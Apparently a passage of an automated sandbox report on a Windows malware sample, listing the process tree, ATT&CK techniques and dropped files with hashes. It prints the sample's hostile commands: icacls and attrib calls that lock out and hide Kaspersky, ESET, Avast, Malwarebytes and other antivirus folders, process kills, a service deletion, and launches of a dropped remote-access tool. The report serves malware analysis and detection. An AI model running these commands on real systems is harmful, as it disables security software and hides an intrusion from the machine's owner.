C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat4⤵
- Drops file in Drivers directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat4⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat4⤵
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM iediagcmd.exe /T /F5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\360\Total Security"5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360TotalSecurity5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360safe5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\Avira5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Package Cache"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\ESET"5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\ESET5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\AVAST Software\Avast"5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\AVAST Software"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\AdwCleaner"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "c:\programdata\Malwarebytes"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\MB3Install"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\KVRT_Data"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Norton"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Avg"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\grizzly"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Doctor Web"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Indus"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\WINDOWS\McMwt"5⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Intel"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Check"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Temp"5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv2⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv3⤵
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵
- Executes dropped EXE
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s TermService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
3Hidden Files and Directories
3Account Manipulation
1Registry Run Keys / Startup Folder
3Winlogon Helper DLL
1Defense Evasion
Modify Registry
9Disabling Security Tools
3Hidden Files and Directories
3Bypass User Account Control
1Impair Defenses
1File Permissions Modification
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Common Files\System\iediagcmd.exe
-
C:\Program Files\Common Files\System\iexplore.exe
-
C:\ProgramData\Microsoft\Check\Check.txt
-
C:\ProgramData\Microsoft\Intel\BLOCK.bat
-
C:\ProgramData\Microsoft\Intel\R8.exe
-
C:\ProgramData\Microsoft\Intel\taskhost.exe
-
C:\ProgramData\Microsoft\Intel\taskhost.exe
-
C:\ProgramData\Microsoft\Intel\wini.exe
-
C:\ProgramData\Microsoft\Intel\wini.exe
-
C:\ProgramData\RealtekHD\taskhostw.exe
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeMD5
a74ad3584394b0766ada52191b245013
SHA16b25f4ba2c86541d4e2e5872a63fa1005373966b
SHA2561e66a4b8154bf4559ec8745bee4130906e0dfeb3ea4992c7bb8d217d2b662737
SHA5125976aa8dd83547613a1a2fff40e4c6ac0c4aff2eb55995e65c5d532768e714504be848a95f055512d1a044527e053ab81bf5c07725f6b7406a5c5c10b26e1be6
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeMD5
a74ad3584394b0766ada52191b245013
SHA16b25f4ba2c86541d4e2e5872a63fa1005373966b
SHA2561e66a4b8154bf4559ec8745bee4130906e0dfeb3ea4992c7bb8d217d2b662737
SHA5125976aa8dd83547613a1a2fff40e4c6ac0c4aff2eb55995e65c5d532768e714504be848a95f055512d1a044527e053ab81bf5c07725f6b7406a5c5c10b26e1be6
-
C:\ProgramData\WindowsTask\audiodg.exe
-
C:\ProgramData\WindowsTask\audiodg.exe
-
C:\ProgramData\WindowsTask\winlogon.exeMD5
ec0f9398d8017767f86a4d0e74225506
SHA1720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484
-
C:\ProgramData\Windows\install.vbs
-
C:\ProgramData\Windows\reg1.reg
-
C:\ProgramData\Windows\reg2.reg
-
C:\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
C:\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
C:\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
C:\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\vp8decoder.dllMD5
88318158527985702f61d169434a4940
SHA13cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA2564c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA5125d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff
-
C:\ProgramData\Windows\vp8encoder.dllMD5
6298c0af3d1d563834a218a9cc9f54bd
SHA10185cd591e454ed072e5a5077b25c612f6849dc9
SHA25681af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe
-
C:\ProgramData\Windows\winit.exe
-
C:\ProgramData\Windows\winit.exe
-
C:\ProgramData\install\cheat.exe
-
C:\ProgramData\install\sys.exeMD5
bfa81a720e99d6238bc6327ab68956d9
SHA1c7039fadffccb79534a1bf547a73500298a36fa0
SHA256222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f
SHA5125ba1fab68a647e0a0b03d8fba5ab92f4bdec28fb9c1657e1832cfd54ee7b5087ce181b1eefce0c14b603576c326b6be091c41fc207b0068b9032502040d18bab
-
C:\ProgramData\install\sys.exe
-
C:\Programdata\Install\del.bat
-
C:\Programdata\RealtekHD\taskhostw.exe
-
C:\Programdata\WindowsTask\winlogon.exeMD5
ec0f9398d8017767f86a4d0e74225506
